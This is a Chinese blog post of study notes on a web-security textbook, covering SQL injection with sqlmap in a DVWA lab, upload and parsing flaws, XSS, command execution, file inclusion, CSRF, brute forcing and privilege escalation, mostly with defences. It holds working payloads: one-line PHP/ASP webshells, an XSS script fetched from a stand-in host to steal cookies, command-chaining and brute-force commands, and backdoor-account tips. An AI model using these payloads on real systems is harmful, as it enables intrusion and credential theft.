Web安全深度剖析-笔记

文章目录

  • Web安全深度剖析-笔记
  • HTTP基础知识
    • http请求方法
    • http状态码
    • http消息头(字段)
    • 截取HTTP请求
    • 搜索引擎劫持
  • SQLmap注入
    • 注入基础知识
    • 使用DVWA来练习使用sqlmap
      • SQLmap基本使用方法
      • 更多的选项
      • 简述利用过程
    • 其他常用的参数用法
    • SQLmap能检测到的注入类型
    • 其他检测SQL注入的工具
  • 上传漏洞
    • WEB解析漏洞简介
      • IIS6.0解析漏洞
      • APACHE漏洞
      • PHP CGI解析漏洞
    • 中国菜刀与一句话木马
    • 利用上传漏洞的方法
      • 客户端使用JavaScript检测后缀名
      • 服务端检测文件的mime类型、检测文件扩展名
    • 修复上传漏洞
  • XSS跨站脚本漏洞
    • XSS的主要类型:反射型、存储型、DOM型
    • 测试XSS漏洞
    • XSS会话劫持
    • XSS框架
    • XSS可能发生的场景
    • XSS的修复
  • 命令执行漏洞
    • OS命令执行漏洞
    • 代码执行漏洞
    • 框架执行漏洞
    • 防范命令执行漏洞
  • 文件包含漏洞入门
    • 本地包含
    • 远程包含
    • 利用方式
    • 修复方法
  • 其他漏洞
    • CSRF跨站请求伪造
    • 逻辑错误漏洞
      • 越权访问:
      • 密码找回逻辑漏洞:
      • 支付逻辑漏洞:
    • 代码注入
    • URL跳转
    • webserver远程部署
  • 实战篇知识点
    • 0day
    • 网站后台安全
    • MD5加密
    • 拖库
  • 综合篇知识点
    • 暴力破解测试
    • 旁注攻击
    • 提权
    • ARP欺骗攻击
    • 社会工程学
  • 总结

HTTP基础知识

http是无状态的,请求之后就响应,然后完成,连接关闭。

http请求方法

序号 方法 描述
1 GET 请求指定的页面的资源,并返回实体主体。(如果请求资源为php、jsp等,则解析后进行展示)
2 HEAD 用于获取报头,类似于get请求,只不过返回的响应中没有具体的内容。(常用于扫描)
3 POST 向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。常用于向服务器发送大量数据。(如请求login.php,并传递账户密码等信息)
4 PUT 客户端向服务器传送的数据取代指定的内容。(可以在服务器端创建,一般会禁用此方法)
5 DELETE 请求服务器删除指定的页面。(可以在服务器端删除,一般会禁用此方法)
6 CONNECT HTTP/1.1协议中预留给能够将连接改为管道方式的代理服务器。
7 OPTIONS 允许客户端查看服务器的性能。(可以查看服务器端允许的请求方法,可以用来收集信息)
8 TRACE 回显服务器收到的请求,主要用于测试或诊断。

http状态码

常见的HTTP状态码:

200 - 请求成功
301 - 资源(网页等)被永久转移到其它URL
302 - 重定向

400 - 请求语法错误
401 - 请求未经授权
403 - 服务器拒绝提供服务
404 - 请求的资源(网页等)不存在
500 - 内部服务器错误

http消息头(字段)

普通头:包括date消息产生的时间日期、connection指定连接的选项(连续的或不连续的)、cache-control缓存指令。

请求头 解释
host 域名
user-agent 客户端信息
referer 上一个页面
cookie 表示请求者身份
range 请求实体的部分内容
x-forward-for xff头,表示请求段的ip
accept 客户端希望接收的消息类型
accept-charset 客户端希望接收的字符类型
响应 解释
server Web服务器的名称
set-cookie 向客户端设置cookie
last-modified 资源上次修改时间
location 重定向的页面位置
refresh 定时刷新浏览器
实体头 解释
content-type 告知客户端实体的类型
content-encoding 应用到实体正文中附加内容的编码
content-length 实体正文的长度
last-modified 资源上次修改时间

截取HTTP请求

工具:burpsuite、fiddler

搜索引擎劫持

现象:直接输入自己网站的域名可直接登录,但是从搜索引擎搜到页面点击时,会跳转到其他页面

http头中有一个字段referer,可记录用户从哪个页面点击过来的,黑客通过user-agent字段实现搜索到从百度等搜索引擎跳转过来的访问请求时,构造一个location字段跳转到其他页面。

Ctrl点击回到目录

SQLmap注入

注意的点:

sqlmap不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点
sqlmap参数区分大小写
添加环境变量:在系统变量的path里面加上sqlmap.py的路径(前提是默认python版本是2才可以),win7的话还要添加可识别的后缀,即pathtxt。

如果你在测试的时候发现sqlmap只检测第一个参数,给URL加个英文引号或许比较好。

注入基础知识

万能密码是典型的SQL注入;

注入基本分为:数字型和字符型,数字型无需闭合引号,字符型需闭合引号;

**查询的方式:**不同的数据库通常有不同的注入方法,但原理基本相似

  1. 枚举表或列来提取信息
  2. 利用数据类型转换错误提取信息
  3. 从数据库系统视图获取源数据
  4. order by、union、having等语句
  5. 数据库提供的函数
  6. 动态执行语句

以上在手工进行SQL注入练习时将详细研究。

使用DVWA来练习使用sqlmap

SQLmap基本使用方法

python2 sqlmap.py -u "带注入点的URL"
如此便可以检测该地址是否存在注入,存在哪几种类型的注入

更多的选项

  • –cookie : 如果网站需要登录则需要设置cookie值
  • -u : 指定目标URL
  • -b : 获取DBMS banner,即数据库信息
  • –dbs : 枚举DBMS中的数据库
  • –current-db : 获取当前数据库名称
  • –current-user : 获取当前用户
  • –users : 枚举DBMS用户
  • –password : 枚举DBMS用户密码hash,一般与-users连用
  • -D : 要枚举的DBMS数据库
  • –tables : 枚举DBMS数据库中的数据表
  • -T : 要枚举的DBMS数据表
  • –columns : 枚举DBMS数据库表中的所有列
  • -C: 要枚举的DBMS数据表中的列
  • –dump : 转储DBMS数据表项

简述利用过程

  1. 带入URL和cookie信息检测是否存在注入点
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low"
  2. 加参数-b --current-db --current-user获取数据库信息,当前数据库名和当前用户等信息
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -b --current-db --current-user
  3. 加参数–users --password获取数据库所有用户名和密码
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" --users --password
  4. 加参数–dbs 获取所有的数据库名
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" --dbs
  5. 加参数-D 确定要采集信息的数据库名,加参数-tables 枚举该数据库的所有表名
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -D dvwa --tables
  6. 加参数-T 确定要采集信息的数据表名,加参数-columns 枚举该数据表的所有列名(字段)
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -D dvwa -T users --columns
  7. 加参数-C 确定感兴趣的字段名,加参数-dump将获取的表项存储下来。
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -D dvwa -T users -C user,password --dump

最终能够得到可以登录dvwa的所有账户密码。

Database: dvwa
Table: users
[5 entries]
+———+———+———————————————+
| user_id | user| password |
+———+———+———————————————+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) |
| 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |
| 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+———+———+———————————————+

原文:http://www.freebuf.com/articles/web/29942.html

其他常用的参数用法

  • 测试注入点权限
    sqlmap.py -u "url" --privileges \测试所有用户权限
    sqlmap.py -u "url" --privileges -U sa \单独测试sa用户的权限

  • 执行shell命令
    sqlmap.py -u [URL] --os-cmd="net user" \执行net user命令
    sqlmap.py -u [URL] --os-shell \系统交互的shell

  • 执行SQL命令
    sqlmap.py -u [URL] --sql-shell \sql交互的shell
    sqlmap.py -u [URL] --sql-query='sql' \sql交互的shell

  • 注入http请求
    DVWA安全级别medium注入方法:中级的页面提交的参数不在地址栏中显示,burp抓包显示参数在http请求的正文中,此时可通过注入http请求的方式,其它步骤基本一致
    sqlmap.py -r head.txt --dbs \head.txt内容为http请求
    head.txt内容如下

    POST /login.php HTTP/1.1
    Host:127.0.0.1/dvwa 
    User—Agent:Mozilla/5.0username=admin&password=password 
    

    head.txt中最好不要直接用抓包数据,建议删掉cookie、Referer等信息。(正确性待定)

  • 注入http请求2
    sqlmap.py -u "url" --forms \forms参数会自动抓取post包,从而进行注入

  • 将注入语句插入到指定位置
    sqlmap.py -u "http://www.xxser.com/id/2*.html" —dbs \伪静态页面可以利用星号指定注入点

  • 使用sqlmap插件
    sqlmap.py -u [URL] -tamper "base64encode.py" \sqlmap自带的插件可以进行特殊的操作

SQLmap能检测到的注入类型

有以下5种:

  • Boolean-based blind(布尔型注入)
    通过判断页面返回情况获得想要的信息。
  • Error-based(报错型注入)
  • UNION query(可联合查询注入)
  • Stacked queries(可多语句查询注入)
  • Time-based blind(基于时间延迟注入)
    盲注的一种,由于页面无回显,添加sleep函数,通过页面响应时间判断是否执行了函数。

其他检测SQL注入的工具

pangolin(穿山甲)、Havij(萝卜头)

Ctrl点击回到目录

上传漏洞

不对上传文件进行格式限制,导致任意文件上传,这就是一个上传漏洞

WEB解析漏洞简介

上传漏洞通常与WEB解析漏洞配合在一起

IIS6.0解析漏洞

  1. 当文件夹名命名为XX.asa或XX.asp时,文件夹中的所有文件都会被当做asp文件来执行
  2. 当文件命名为*.asp;1.jpg时,此文件会被当做asp文件来执行
  3. WebDav漏洞:开启webdav后,可扩展move、copy、delete等HTTP方法,此时即可put一个a.txt写入一句话木马,并通过copy或move改名为xx.asp,这样即可轻松上传一个webshell。同样可以使用delete方法删除任意文件。

APACHE漏洞

Apache在解析文件时有一个原则:当碰到不认识的扩展名时,将会从后向前解析,直到碰为止,如果都不认识,则会暴露其源代码。比如:1.php.rar ,apache不认识rar后缀,就会解析成php文件。

PHP CGI解析漏洞

Nginx曾经有两个解析漏洞,当在正常网页www.xx.com/1.jpg后面加上/xx.php时(xx.php文件不需要存在),1.jpg就会被当成PHP脚本来运行。
但此漏洞为PHP漏洞,因为PHP的配置文件中cgi.if选项默认开启向前递归解析,当xx.php文件不存在时,就解析上一级文件,造成解析漏洞。

中国菜刀与一句话木马

往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录
通常会构造图片木马,方法:

  • cmd使用copy xx.jpg/b+xx.php/a xxxx.jpg构造图片木马
  • 也可以使用edjpgcom.exe

各语言的一句话代码

asp的一句话是:
<%eval request ("pass")%>
aspx的一句话是:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句话是:
<?php @eval($_POST['pass']);?>

利用上传漏洞的方法

客户端使用JavaScript检测后缀名

绕过方法:

  1. 本地构造表单突破验证,或通过firebug(浏览器插件)在页面源代码中删除掉触发JavaScript检测的事件,就可以绕过验证;
  2. 中间人攻击方法,使用burpsuite上传正常后缀的文件,然后再传输中的HTTP层修改后缀名,需同时更改content-length值;

服务端检测文件的mime类型、检测文件扩展名

**黑名单过滤 **

绕过:找开发人员忽略的扩展名、AsP和PhP等大小写转换(win系统会忽略后缀名的大小写)、后缀名后加小数点或空格(win系统会自动忽略后缀名后的小数点或空格)

**白名单过滤 **

绕过:利用IIS 6.0解析漏洞,上传XX.asp;.jpg图片,IIS 6.0会把图片当成脚本执行。

MIME验证

mime类型用来设定某种扩展名文件的打开方式,如GIF图片的mime类型为image/gif
绕过:中间人攻击方法,上传php脚本文件后,HTTP请求头content-type值为applicat/php,将在HTTP请求中的Content-Type更改为image/jpeg类型,即可通过验证。

目录验证

如果在网页源码中可以对上传目录进行控制(修改文件上传的目录),控制文件上传到XX.php文件夹,并提交一句话图片木马,此时可利用IIS 6.0漏洞进行解析。

截断上传

上传1.asp 1.jpg(中间有空格)文件名的木马,在burpsuite的repeater功能hex选项中修改http请求包的空格的HEX值,由20改为00,即将空格改成null值。上传后文件名即为1.asp

文本编辑器上传漏洞

举例:fckeditor类似于插件,常插入到网站中,例如论坛。2.4.2版本以前有上传漏洞,可通过00截断上传脚本,获取webshell

具体方法:

  1. 打开某网站主页,在地址后面添加“/fckeditor“,若出现禁止访问,则判断有fckeditor编辑器;
  2. 在地址后面继续添加“/_whatsnew.html”就回返回fckeditor的版本信息;
  3. 打开存在漏洞的上传页面:地址+FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
  4. 上传一个asp脚本,命名为1.asp.jpg,并在burpsuite的hex中将jpg前点的二进制码改为00,即可上传成功;
  5. 然后即可使用菜刀连接

.htaccess文件攻击

如果可以上传自定义的htaccess文件,并覆盖掉原来的文件
可以在里面添加如下内容,意为:文件名中包含haha的文件都当做PHP文件执行,此时便可直接菜刀连接。

<FilesMatch "haha">
SetHandler application/x-httpd-php
</FilesMatch>

修复上传漏洞

上传漏洞的原因:

  • 未限制上传文件类型;
  • 目录过滤不严,攻击者可建立畸形目录;
  • 文件未重命名,攻击者可利用web容器解析漏洞;

解决以上问题,基本可以避免上传漏洞,但不绝对。

Ctrl点击回到目录

XSS跨站脚本漏洞

xss属于客户端攻击

用户浏览嵌入恶意代码的网页时,恶意代码会在用户浏览器上执行操作,理论上与服务器无关系,只攻击用户,但网站管理员也是用户!。

  • 最简单的xss举例
    在网页的文本输入框内,输入<script>alert(/xss/)</script>,提交后即可弹窗
  • 复杂的xss举例
    在网页的文本输入框内,输入<script src="http://www.xx.com/x.txt"></script>,提交后即可从外部加载脚本,实现诸如获取用户cookie,或是监控键盘记录等等。

XSS的主要类型:反射型、存储型、DOM型

反射型

非持久性XSS,每当用户访问一个带有xss代码的网页时,服务器发送数据到用户浏览器,浏览器在解析这段xss代码,造成xss漏洞。

存储型

持久性XSS,当页面允许用户存储数据时,攻击者提交一段xss代码后被服务器接收并存储,当攻击者再次访问这个被存储的数据时,这段xss代码就会被读出来,响应给浏览器,造成xss攻击。
当存储数据时还要考虑是否需要闭合HTML代码,保证xss代码被执行。

DOM型

入门阶段不做深入研究

测试XSS漏洞

可得知输入位置(能在页面查看源码)

输入aaaaaaa<>'"&然后在源码中查找aaaaaaa,可得知程序是否对敏感字符做过滤;

无法得知输入位置

留言过后需要管理员审核的情况,无法得知数据在后台页面处于何种状态,通常采用输入/>xss test来测试

全自动测试

APPscan、AWVS、burpsuite都可以有效检测xss漏洞。但短信验证、验证码检测的页面就需要手工进行检测了

XSS会话劫持

cookie简介

cookie允许服务器存储少量的数据到客户端硬盘,并通过读取这些数据标识用户,维持会话。
cookie分内存cookie(存在时间短,浏览器关闭即消失)和硬盘cookie(存在时间较长)。
cookie通常由变量名和值组成,可能还有date用来确定失效时间、domain和path设置允许访问cookie的范围、secure加密协议才可使用cookie。还有HttpOnly字段,禁止JavaScript读取cookie,此字段可有效防止xss会话劫持。

cookie的利用

cookie有时会用来做身份验证,黑客获取到cookie即可使用burpsuite等工具实现无密码登录。

SESSION简介

用户浏览一个网页即是一个客户端与服务端的会话,被称为SESSION。
SESSION是一个随机不重复的的“编号”,随浏览器和服务器关闭。
SESSION可以存储在cookie中,作为临时cookie。cookie和SESSION的最大区别是,cookie存储于客户端,SESSION存储于服务端,其在客户端仅显示为一个ID。
当会话未关闭时,获取到session同样可以 会话劫持。

XSS框架

xss框架是一组JavaScript工具集合,如键盘记录,盗取cookie,表单劫持的等,国内最著名的是xsser.me。

XSS可能发生的场景

  1. 输入的数据在标签内部
    最简单的的跨站,无需构造标签
    <div>${input}</div>
    ---------------->
    <div><script>alert(/xss/)</script></div>
  2. 输入的数据在属性内部
    仅仅需要闭合标签即可进行xss操作
    <div class="${input}"></div>
    ---------------->
    <div class=""><script>alert(/xss/)</script>"></div>
    <div class="" onclick="alert(/xss/)"></div>
  3. 输入的数据在事件中输出
    与属性内输入相同
    <img src="xx.jpg" onerror="${input}">
    ---------------->
    <img src="xx.jpg" onerror=""><script>alert(/xss/)</script>">
    <img src="xx.jpg" onerror="" onclick="alert(/xss/)">
  4. 在CSS中输出
    css中输出同样存在xss风险
    <style type="text/css">
    body {background-img:url("${input}");}
    </style>
    ---------------->
    body {background-img:url("javascript:alert('xss')");}
  5. 在script标签内输出
    <script>
    var usrname = "${input}"
    </script>
    ---------------->
    var usrname = "1";alert(/xss/);//"此处的//为javascropt简称js的注释标记

XSS的修复

XSS的形成,是因为未对输入和输出进行严格的过滤,导致在页面执行JavaScript等客户端脚本。

  1. 在HTML中对特殊字符<>/'"&等符号进行字符转义
  2. 打开cookie中HttpOnly属性
    此对防御xss不起作用,主要防止xss漏洞后续的cookie劫持攻击。xss的攻击手段太多,能够模拟正常操作,盗取信息,钓鱼等等,仅靠httponly不够。

Ctrl点击回到目录

命令执行漏洞

OS命令执行漏洞

OS命令执行漏洞可以直接执行系统层或应用层命令

通过客户端、页面等在服务器端执行系统命令。
产生原因:命令可连接执行
ping 8.8.8.8 && net user
其他命令连接符:如&、||、|等

举例如dvwa的命令执行漏洞。

代码执行漏洞

代码执行漏洞通过执行脚本代码来调用操作系统命令

php命令执行漏洞

主要是一些函数的参数过滤不严格所导致,可以执行OS命令的函数一共有7个:system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()

JAVA命令执行漏洞

Java SE存在runtime类,提供exec方法以执行字符串命令。

框架执行漏洞

框架,即framework。是某种应用的半成品,是一组组件,供你选用完成你自己的系统。
框架出现漏洞影响范围会比较大。

struts2代码执行漏洞

struts2是java的三大框架之一,历史上爆发多次命令执行漏洞,可以使用K8漏洞利用工具进行检测。

ThinkPHP命令执行漏洞

是一款老牌PHP框架,曾发生过任意代码执行漏洞,可插入一句话木马,使用菜刀连接。

防范命令执行漏洞

使用执行命令的函数方法要做好敏感字符过滤和转义,并确保输入可控。

“有输入的地方就有可能存在漏洞。” —— 一句老话

Ctrl点击回到目录

文件包含漏洞入门

包含漏洞经常出现在PHP语言中,文件包含漏洞分为本地包含和远程包含

本地包含

PHP中常用的文件包含函数include() require()
当包含一个php文件时会执行它(上传恶意代码来包含),当包含非php语法规范的文件时会暴露文件的内容(可用于查看配置文件)

远程包含

需要开启远程包含选项(默认关闭的)
可连接到外部网站,可连接一个其他网站的php木马,在网站执行

利用方式

  1. 本地包含读取敏感配置文件

  2. 远程包含一句话木马,意为新建一个shell.php,内容为php一句话木马内容

    <?fputs(fopen("shell.php","w"),"<?php eval($_POST[xxser]);?>")?>

  3. 利用文件上传后配合本地包含来执行

  4. 利用PHP自带的封装协议

    php://可以用来读取php文件的内容,直接包含的话会执行PHP文件;

    php://input在远程包含选项开启的情况下,可以用此协议执行PHP语句;

  5. 包含apache日志

    当存在文件包含漏洞却无法找到合适的文件来利用时,可以找apache的日志文件路径(重点),然后直接访问http://www.xxser.com/<?php info();?>再通过burp编码防止地址中的特殊符号被转码,然后就可以在日志文件中生成有完整PHP代码的日志记录,在利用包含漏洞如包含日志文件,即可执行其中的PHP代码

  6. 截断包含

    当文件包含时被限定扩展名只能为php时(无法通过上传图片木马创建一句话木马),使用%00截断字符放在图片文件扩展名后,截断扩展名限制。仅限未对特殊字符转义的情况下。

修复方法

  1. 严格判断包含中的参数是否外部可控;代码层面
  2. 限制被包含文件所在路径,并限制目录跳转字符../
  3. 为被包含文件设置白名单;
  4. 尽量不使用动态包含;

Ctrl点击回到目录

其他漏洞

CSRF跨站请求伪造

在浏览器和服务器的会话未结束时,利用用户的权限执行操作,别称”one click attack“

即通过输入特定的URL或者访问特定的HTML文件已达到执行某些敏感操作的目的,能够这样操作的站点均存在CSRF漏洞。

测试方法

OWASP-CSRFTester-1.0

设代理–抓取–修改参数构建HTML测试包–使用HTML测试

Burpsuite

在安全度low的dvwa的CSRF测试页面随意提交一些数据,然后抓包,右键选择Engagement tools – Generate CSRF PoC,在参数页面修改想要提交的参数值,点击左下角Generate生成攻击脚本,可直接复制URL在浏览器测试,或复制html文本到本地打开,能够达到预期的效果即存在CSRF漏洞。

解决方法

  1. 二次点击确认操作

  2. token认证:

    用户登录时随机分配一段字符串,存储在session中,提交表单参数时,token作为一个参数存在,以确认操作是不是正常请求。如果是GET请求,无参数传递,则将token值存储在cookie中,完成后更新token值。

csrf是xss的缩小版,xss危害比csrf大,如果存在xss则防范csrf无意义。

逻辑错误漏洞

逻辑漏洞:程序开发时,遗漏某些可能出现的情况,或不能正确处理,导致逻辑上的漏洞,比如越权。

越权访问:

水平越权:相同级别、权限的不同用户之间越权访问、修改或删除等操作。容易造成大批量用户信息泄露或信息恶意篡改。

垂直越权:不同级别、权限的用户之间,分为向上越权和向下越权。

密码找回逻辑漏洞:

通过邮箱找回密码的步骤一般是:1. 首先验证该用户的密码找回邮箱是否正确;2. 向该邮箱发送密码重置的链接。
如果可以抓包修改向哪个邮箱发送链接,即可使用自己的邮箱接收他人的密码重置链接。

支付逻辑漏洞:

商品数量为负数:当某购物网站未对商品的数量进行验证,修改商品数量为负数,则付款金额为负数,购买完成时自己的余额便会增加相应的数量,此为“刷钱漏洞”。

**0元购买商品:**案例:一般程序会有异常处理机制,比如尝试将某字符串转换为数字时,为了不让程序崩溃,会将此变量赋值为某个初始值(比如0)并抛出异常提示。如果没有中断此进程,这个0值可能参与接下来的程序运行。 如将单价抓包修改为字符串,产生异常后程序将单价赋值为0,如果继续付款就会以0元单价购买商品。

**指定账户恶意攻击:**案例:某拍卖行账户输入密码错误次数3次后锁定1天,如果攻击者得知竞争对手的拍卖账户,每天0点恶意尝试密码以致账户锁定,则会产生不公平竞争。
如果网站账户可以轻易获取,并存在登录失败锁定功能,则可判断其存在信息泄露或指定账户恶意攻击漏洞。

代码注入

两种定义:1,客户端提交的代码在服务器端当做动态代码或嵌入文本处理;2,客户端提交的代码未经检查就让服务器来执行。
1定义 包含OS命令执行、文件包含、动态函数调用、代码执行等;
2定义 则将SQL注入、XML注入、xss文件包含、命令执行等都视为代码注入范围。

XML注入

xml一般用于网络数据的转换和描述,而非显示。

此类型注入比较少见,利用方式为:如果某网站采用xml文件保存重要的登录信息且事先了解到xml的表结构,则通过闭合标签向xml写入数据,即可拥有随意新建账户的能力。

XPath注入

xpath是XML路径语言,可把xml文件当做数据库表,通过xpath语言进行查询,此时攻击方法类似SQL注入。

解决方法:对xpath查询语句进行预定义字符转换。

JSON注入

json是JavaScript的一种轻量级的数据交换格式,功能与xml类似。在json中插入特殊字符,如引号,仅会破坏json的表结构,导致解析失败。

解决方法:对存储到json的特殊字符进行转义。

HTTP 参数污染

HTTP请求中可以传输多个相同的参数项,而不同的web容器会选取不同位置的参数来取值,此时可利用参数污染来绕过WAF。

PHP:news.php?id=1&id=select username,password from admin--
WAF认为此请求的参数为id=1,而PHP取值select username,password from admin--

ASP:news.aspx?id=1;&id=s&id=l&id=e&id=c&id=t&
asp将会把相同参数的值链接在一起使用,此时会取值id=1;&id=select

URL跳转

客户端跳转:也称为URL重定向,浏览器地址栏会有明显的变化,在HTTP请求头中可以看到302指示。可能产生URL重定向漏洞。

服务器跳转:也称为URL转发,浏览器地址栏无变化,无法利用。

<a>标签跳转既不属于转发,也不属于重定向,<a href= "http://www.xxser.com/news.jsp">新闻列表<\a>

案例:

QQ发送求投票的钓鱼网站,打开后请求qq登录盗取QQ密码,漫游聊天记录信息进行社工,仿照被攻击的聊天习惯向好友发送诈骗信息。

webserver远程部署

Tomcat

tomcat是一个流行的Java web应用服务器,安装后默认端口为8080,Tomcat的默认部署界面存在manager管理页面,如果拥有manager权限账号即可远程管理网站,上传web shell,默认的存在admin/admin的管理密码。

JBoss

JBoss是JavaEE的开源应用服务器,一般与Tomcat或jetty绑定使用,安装后默认端口为8080,JBoss的默认部署界面存在JMX Console管理页面,且默认无需密码验证就可以远程部署webserver。

WebLogic

weblogic是BEA的一个应用服务器,基于JavaEE的中间件,安装后默认端口7001,URL后添加console即可跳转至管理界面,新版本对管理界面的密码策略要求严格,基本无法破解,老版本存在账密相同的Weblogic,system,guest,portaladmin等弱口令。

Ctrl点击回到目录

实战篇知识点

0day

原意指的是软件第一天发布就被他人破解了,现在一般指无补丁的漏洞。一般通过源代码审计来挖掘0day漏洞。

网站后台安全

主题样式可编辑可以插入一句话木马
后台文件管理功能
后台执行SQL语句管理数据库功能
备份数据库功能可以让程序将图片木马备份成脚本文件

MD5加密

普通的md5密文70%可以通过解密网站进行破解,安全的加密方法为:一次md5加密后在制定位置添加一段密文进行二次md5加密,即可提高破解难度。

拖库

知道数据库密码且支持外连接的情况下,可以使用navcat连接拖库;

不支持外连接只能通过SQL注入,提权,本地导出等方法;

Ctrl点击回到目录

综合篇知识点

暴力破解测试

SQL server数据库端口1433
Oracle数据库端口1521
MySQL数据库端口3306
DB2数据库端口5000

爆破工具Hydra

命令演示(需在hydra.exe的目录的cmd下运行):
hydra -l root -P C:/passlist.txt 192.168.1.1 mysql
指定用户root,使用密码txt文件破解密码,目标为192.168.1.1的MySQL数据库

hydra -L c:/user.txt -P c:/pass.txt -t 5 192.168.1.1 ftp
同时爆破192.168.1.1的ftp用户和密码,指定线程为5

hydra -l Administrator -P c:/pass.txt www.xxser.com rdp -V
爆破rdp(Windows远程桌面)密码

爆破工具Medusa

命令演示,工具在kali里面有集成

medusa -h 192.168.1.1 -u root -P pass.txt -M mysql

验证码爆破

一般手机邮件接收的验证码为4位数字,30min有效,只要在30min内遍历0000~9999即可爆破验证码。

防止爆破

密码复杂性、复杂的验证码、限制登录次数

旁注攻击

旁注攻击即通过与目标网站同服务器的其他网站渗透到目标网站,再通过提权获取目标站点的权限。这一过程就是旁注攻击的过程。

IP逆向查询

通过网站域名查询IP地址,再通过IP地址查询相同IP地址的站点。

如果其中一个网站存在注入点,则可能获取整个服务器上所有的数据库表。此外还能使用目录越权、构造注入点(仅用于知道数据库账密,但无法直接连接的情况)

CDN

CDN就是将原服务器上可以缓存的文件(静态文件、图片、JS、CSS等)下载到缓存服务器,当用户在访问你的域名时,将会访问缓存服务器,而不是直接去访问源服务器。

服务器使用cdn后真实IP地址会被隐藏,此时可通过1,寻找网站phpinfo()页面获取服务器配置信息;2,主域名会用cdn,子域名不一定,ping没有用cdn的子域名地址即可获取ip;3,观察IP变化,猜测真实IP地址。(3?)

提权

溢出提权:在有溢出漏洞的机器上执行溢出程序,可获得一个root shell

第三方组件提权:数据库提权(注入点或执行系统命令)、FTP提权(ftp可执行系统命令或ftp软件漏洞)、PcAnywhere远控软件提权

提权辅助:

  1. 3389端口:获取服务器cmdshell权限后,可通过bat代码开启RDP服务;

  2. 端口转发:使一个外部用户从外部连接一个在私有局域网内部上的一个端口。工具:lcx、reDuh等

    简单利用方法(lcx):

    1. 个人主机用lcx监听500 8888端口;lcx listen 500 8888
    2. 内网服务器将端口数据转发;lcx.exe -slave 个人主机IP地址 500 127.0.0.1 3389
    3. 外部主机通过mstsc 127.0.0.1:8888即可连接内网主机

    原理:外部主机无法直接连接内网服务器,但可以让内网服务器主动将自己的3389发送到外部主机的指定端口上,这样通过外部主机的指定端口就可以连接内部主机主动转发的3389端口,即可实现远程控制。

  3. 启动项提权:编写一个创建admin账户的bat脚本,放在启动文件夹里

  4. DLL劫持:任何exe文件的文件夹下如果有lpk.dll则会运行,否则运行系统目录下的dll文件。利用工具T00ls Lpk Sethc可以制作dll文件后门。

  5. 添加后门:创建隐藏的账户

ARP欺骗攻击

使用arp攻击欺骗局域网内的其它主机,自己可以作为中间人截取其他主机之间的通信,还可以实现域名劫持。

防御方法包括:1,静态arp地址绑定;2,arp软件防火墙(简单操作即可追踪,拦截arp攻击)

社会工程学

《欺骗的艺术》–凯文.米特尼克


总结

18/11/5看完第一遍,只是一知半解,后续进入实战的练习中了。。。

加油吧 骚年~



文章目录

  • Web安全深度剖析-笔记
  • HTTP基础知识
    • http请求方法
    • http状态码
    • http消息头(字段)
    • 截取HTTP请求
    • 搜索引擎劫持
  • SQLmap注入
    • 注入基础知识
    • 使用DVWA来练习使用sqlmap
      • SQLmap基本使用方法
      • 更多的选项
      • 简述利用过程
    • 其他常用的参数用法
    • SQLmap能检测到的注入类型
    • 其他检测SQL注入的工具
  • 上传漏洞
    • WEB解析漏洞简介
      • IIS6.0解析漏洞
      • APACHE漏洞
      • PHP CGI解析漏洞
    • 中国菜刀与一句话木马
    • 利用上传漏洞的方法
      • 客户端使用JavaScript检测后缀名
      • 服务端检测文件的mime类型、检测文件扩展名
    • 修复上传漏洞
  • XSS跨站脚本漏洞
    • XSS的主要类型:反射型、存储型、DOM型
    • 测试XSS漏洞
    • XSS会话劫持
    • XSS框架
    • XSS可能发生的场景
    • XSS的修复
  • 命令执行漏洞
    • OS命令执行漏洞
    • 代码执行漏洞
    • 框架执行漏洞
    • 防范命令执行漏洞
  • 文件包含漏洞入门
    • 本地包含
    • 远程包含
    • 利用方式
    • 修复方法
  • 其他漏洞
    • CSRF跨站请求伪造
    • 逻辑错误漏洞
      • 越权访问:
      • 密码找回逻辑漏洞:
      • 支付逻辑漏洞:
    • 代码注入
    • URL跳转
    • webserver远程部署
  • 实战篇知识点
    • 0day
    • 网站后台安全
    • MD5加密
    • 拖库
  • 综合篇知识点
    • 暴力破解测试
    • 旁注攻击
    • 提权
    • ARP欺骗攻击
    • 社会工程学
  • 总结

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. 名字真好听的五子棋——12周进度

